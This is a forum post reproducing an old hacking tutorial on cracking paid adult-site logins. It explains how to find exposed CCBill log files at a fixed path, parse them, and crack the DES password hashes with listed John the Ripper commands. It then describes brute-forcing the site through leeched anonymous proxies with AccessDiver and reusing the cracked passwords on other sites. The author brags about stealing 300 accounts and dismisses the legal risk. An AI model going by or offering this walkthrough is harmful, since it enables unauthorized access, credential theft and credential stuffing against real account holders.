Okay the tutorial has been ported for forum use by voide and is located below, thanks voidz0r!
edit: Okay, I had to take out the hosted images because they were bogging down my crappy home server. So I added direct links to the images. This thread will load faster too. Sorry for any troubles.
You can contribute by posting relevant links!
Contributions by: X-Intruder, vOidE
th famouse old: john the ripper: http://www.openwall.com/john/
The What's and How's of Bruteforce and Dictionary attacks.
Written by: NoUse
: If you are under the age of 18 and do not like pr0n, I would advise you to leave. IF you like pr0n and want all the free pr0n you can get by craxz0ring pr0n sites, read this article on bruteforcing so you can get all the free pr0n.
If you plan on following along, you will need the >available package<
"When a thief goes to rob a car he doesn’t have one set plan of how he is going to break into the car, he checks the environment first then makes his decision of how he is going to carry out the illegal operation."
II. What are brute force and dictionary attacks?
III. How do I crack?
As some of you probably already know, there are a LOT of brute forcing tutorials out there already. So you may be wondering why I would waste my time to write another. Well, it is true that there are lots of tutorials out there already. But what many of them fail to succeed in, is making sure the user knows and understands how to implement that knowledge into a full scale attack. That is why I am here to explain and demonstrate how to do just that.
II. What are brute force and dictionary attacks?
To begin with, I think it is important to note that Dictionary attacks and brute force attacks are not the same, but are actually quite different. Brute force attacks (or brute forcing for short) is a method which tries EVERY possible key combination and runs these random keys against a password. While a dictionary attack just runs a dictionary (a list of words) against the password to see if it's a match. Brute forcing can come in handy sometimes, but is ultimately a waste of time (depending on the situation). So in this Tutorial we will be speaking more along the lines of Dictionary attacks although I may be calling it brute forcing.
There are two types of dictionary attacks, online and offline. This is solely dependant on the situation.
[Offline] Cracking a SAM password file.
[Online] Cracking a ftp password.
Please note that those are just two types
of Dictionary attacks but there are many ways to perform these type of attacks.
III. How do I crack?
Cracking is an ambiguous term that I feel I must define now. There are multiple types of "cracking", such as cracking a software application or a SAM/.pwl file. There are also the online types of "cracking" such as running a dictionary attack against a pr0n site. In this tutorial I will be referring to the cracking of online websites.
[you] Okay, so how do I crack?
The most common (and affective) way of cracking is to obtain a reliable Brute Forcer. There are many out there, but to name a few:
Note: All of these brute forcers also have dictionary attack capabilities.
- If you read my >Hackology<
article, you should be able to predict how this will perform.
- Havn't tried this one, but by the looks of it and all of MooRer's other applications I assume it would perform quite well.
- A pretty decent brute forcer, performs well.
- This one is my favorite. It is reliable, has proxy support, and also has many other features that are very useful when preparing to brute force. This is also the one we will be using in the demonstration. You can grab it >here<
There are many more different brute forcers out there, those are just the most popular ones as of 2004. The next step is configuration. Configuration varies from brute forcer to brute forcer, but they all generally have the same basic configuration. It is very important to know what you are doing
when configuring your brute forcer. This is the hardest part for newbs because they don't research on what certain options do/mean and then they get all disappointed when it doesn't perform properly. When bruting, you must
know what type of authentication the site is using because trying to brute force a form login with basic authentication settting just isn't going to cut it around here. So here is the difference between your two basic html authentications:
o Basic Authentication
This is the password prompt that you see at most porn sites. It is called Basic Authentication. And it's basically just a little pop-up box asking for a username and password.
o Form/cgi login
This is the type of login you see at places like hotmail and geocities. The login for the username and password is kind of "built-in" with the page instead of on a pop-up.
Now as for the different types of methods to use, you will most likely be using "GET" for most of your bruting experiences. "GET" is just basically the original way to retrieve (hence GET) information while "POST" can be used under other circumstances such as sending mail or updating data. AccessDiver uses "a fast access method to test standard security" which we will be using in the demonstration.
There are many other options in brute forcers, but the rest are pretty self-explanatory. The type of login and the method to get info is really all you need to know.
In this demonstration, we will be using >AccessDiver<
to crack a basic authentication login. Since we will be cracking a basic authentication login from a porn site there are a couple of things to learn ahead of time about cracking porn sites. You probably won't be needing these steps if you arn't planning on cracking and porn sites, but it is good to get background of whatever you are cracking none the less.
1. What billing company they are using.
2. What restrictions the billing company uses for their usename and passwords. (this is really only important if you plan on making your own word list).
The purpose of finding out what billing company the porn site uses is to:
a) Hopefully, find and crack .log files of that specific billing company.
b) Find a username and passlist for that billing company.
Now you are probably sitting here baffled as to what a billing company is, what a .log file of that company is, how to find out which billing company the porn site uses, and how to find .log files of that billing company. Well, that is why I am here. A billing company is basically a way for users to pay the porn site for a username and password securely by credit card. Not much to it, it's pretty straight forward. It's not a difficult task to find out which billing company the porn site is using. For example, take a look at the screen shot below. I decided I would be cracking OnlyTease.com today, so here is how to find the billing company of OnlyTease.
The name of the billing company will always be listed around the "join" section of porn sites. As you can tell, it's listed 3 times at onlytease.
So now that you know how to find out what billing company the porn site is using, how do you know what restrictions they set on username and passwords? Well, I have the list of restrictions >here<
(I did not compile this list, nor do I take any type of credit for it. Billing companies probably change their restrictions around a lot, so it may not be 100% accurate.). And as the list says, our company (ccbill) has no restrictions on username and passwords, so you could probably run any type of wordlist against ccbill sites and still have a chance of cracking a username/pass. But why would we want to that against a site that already has it's ccbill.log available. Looky what I found on onlyteast:
ccbill.log files will not always be available for the public (they actually never should be, pr0n people are just stupid (hence why they are in the pr0n business)). But on certain sites it is available. ccbill.log files, if available, will always be located at /ccbill/secure/ccbill.log. Now you may be wondering, "wtf, is this .log file. it looks like random letters and stff". That is why you need a parser and a cracker. Yup that's right we have to do a lot more before we even begin to start cracking. Let me just list what we have to do (and unforunately, I have to explain all of this to you...):
1. Find site (ccbill)
2. ccbill.log not available from that site keep looking for ccbill sites that have their ccbill.log available
3. parse the ccbill.log file
4. crack the ccbill.log file (now our wordlist is ready)
5.setup AccessDiver with all of it's options
6. Get many, many, proxies
7. Check proxies for speed/accuracy (lose 1/2 of proxies)
8. Check proxies for anonymity (lose 3/4 of proxies, we have 12% of the proxies we began with)
9. Repeat steps 6 through 9 until a sufficient amount of proxies have been reached. (1000 should be fine)
10. Begin cracking.
Don't let the proxy part discourage you. AccessDiver has an amazing tool that will make the process a WHOLE lot faster, we will get to that later.
Okay, so now that we have located the ccbill.log file, we will need to parse the .log file with a ccbill paser. I supplied one in the >package.zip<
. So open up Z_nakeR2 and click on the ccbill.log tab, it should look like this:
You will need to create an empty text file to save the result in.
Click on the folder icon to open up the ccbill.log file. Now click on the diskette icon and select the empty text file you created. Now click the hazard symbol to begin. You should get a message box within seconds saying it has finished. The .log file is now parsed and is located in the old empty text file. If you look at the file now, it has the username and then some weird symbols and/or random letters for the password. The passwords are encrypted. The type of encryption that is used is called >DES<
and can be cracked pretty easily.
Now we get to use John The Ripper to crack the >DES<
encryption(I know you've always wanted to use John). I supplied a command line version of john in the package.zip. Put your newly parsed ccbill log file in the same directory as john.
The easiest way to do this is to put the whole john folder in c:\ so you won't have to navigate far. So to get started, go to your command prompt. (start >> run >> cmd) now hit enter. If you arn't on an NT machine you will have to substitute cmd for command. Now navigate to the fold that john is located in. If you put the whole john folder in c:\ all you should have to type is:
"cd c:\john-16d\john-16\run" *enter*
But if you don't know how to use a command prompt at this point, perhaps you should do some more learning before you even attempt to crack any sites.
Now all you should have to type is:
"john -i [name of your parsed log file].txt" *enter*
Some other JTR commands are as follows:
-quick attack: john -si ccbill.txt
-wordlist attack: john -w:list.txt ccbill.txt
-heavy wordlist attack: john -w:list.txt -rules ccbill.txt
-another heavy attack: john -i ccbill.txt
-only numbers: john -i:digits ccbill.txt
-only letters: john -i:alpha ccbill.txt
And as you can tell, we are executing the really heavy attack. This attack may take a long time, I usually let it run over night and it usually finishes up. If it takes longer than a night I'll stop it and just extract the username and passes it already cracked.
To save the cracked file just execute the command:
"john -show [name of your parsed log file].txt > result.txt"
And all of the username/passwords will be saved to result.txt.
Now, let's get AccessDiver configured. Just follow each of these screen shots exactly.
Okay, now that we have AccessDiver configured properly, we are going to need to get some proxies. You can get proxies however you like, but I found that the easiest way is to use AccessDiver's Web Proxy Leecher:
Once you leech those proxies, click on the button "add these proxies in.." and then add them to your proxy analyzer. Once you are at the proxy analyzer, do the speed/accuracy test and wait until it has completed. Now click on the brush and delete bad results and timed out.
Now go to the proxy judge tab down at the bottom and click on a proxy judge website. Then do the confidentiality test.
After the test is finished, go back to the paintbrush tool and "delete everything non-operational and not anonymous".
Now click the "USE Proxy" and add selected proxies into your proxy list.
Now start ownez0ring the site!
And wait until it finishes running. This is the first time I've brute forced this particular porn site, but the funny thing is, I got 300 username and passes out of it!
That is basically all there is to it. Not too difficult, and the same rules can be applied to any other sites as well.
Bruteforcing is extremely easy and you won't be considered leet if you crack any sites. You don't really have to worry about lawsuits if you don't use "all" anonymous proxies if you are just cracking porn sites because I doubt they would actually take the time to take you to court over a 20 dollar account.
ccbill.log files can and should be tried on sites other than the one you found the log file on. Most people who pay for accounts on a porn site are likely to pay for more porn sites and are likely to use the same password, therefor it would be a good idea to run the same list against different sites. Comprende? I hope you enjoy free pr0n.
Final note: I rushed this tutorial, so it may not be as detailed as it could be. Bruteforcing shouldn't need a 100 page tutorial though, it's too easy for that.
Oh yea, Raptor is used to combine .log files into one huge file...forgot to mention, it's in the >package.zip<
if you need it.